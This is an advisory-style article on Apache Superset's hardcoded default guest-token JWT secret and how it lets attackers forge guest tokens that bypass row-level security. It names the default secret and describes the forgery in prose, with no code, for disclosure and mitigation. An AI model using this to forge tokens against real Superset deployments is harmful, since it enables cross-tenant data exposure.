Hardcoded Superset Secret Leaves Embedded Dashboards Vulnerable to Guest Token Forgery

A security gap in Apache Superset's default configuration exposes embedded dashboards to token forgery attacks. The file `superset/config.py` ships with `GUEST_TOKEN_JWT_SECRET` hardcoded to `"test-guest-secret-change-me"` — a publicly documented default value that anyone can read from the source code. Unlike Flask's `SECRET_KEY`, which triggers a hard failure at startup when left at an insecure default via `KNOWN_INSECURE_SECRET_KEYS`, the guest token secret lacks any equivalent startup guard. Any Superset deployment that enables the `EMBEDDED_SUPERSET` or `EMBEDDED_DASHBOARD` feature flag without explicitly overriding this value is signing guest JWTs with a world-readable secret committed to a public repository.

The vulnerability stems from the token minting logic in `superset/security/manager.py`, specifically the `create_guest_access_token` and `parse_jwt_guest_token` functions. These routines rely entirely on the HMAC secret for signature verification. An attacker who identifies an exposed embedded dashboard can craft a guest token containing arbitrary user identity claims and attacker-controlled Row-Level Security (RLS) clauses. Because the signing key is known in advance, the forged token passes verification, effectively bypassing tenant isolation enforced by RLS policies. This is not a theoretical attack surface — the default exists in production builds for any organization that failed to audit the configuration during deployment.

The severity escalates to critical for multi-tenant environments where embedded dashboards serve external users or partners. Organizations relying on RLS to enforce data segmentation risk cross-tenant data exposure through a forged guest token. The recommended mitigation is immediate: generate a cryptographically strong, random secret and set it explicitly via environment variables or configuration overrides. The absence of a startup guard that flags this known-insecure default represents a design gap that leaves even security-conscious deployments exposed if they neglect manual configuration audits.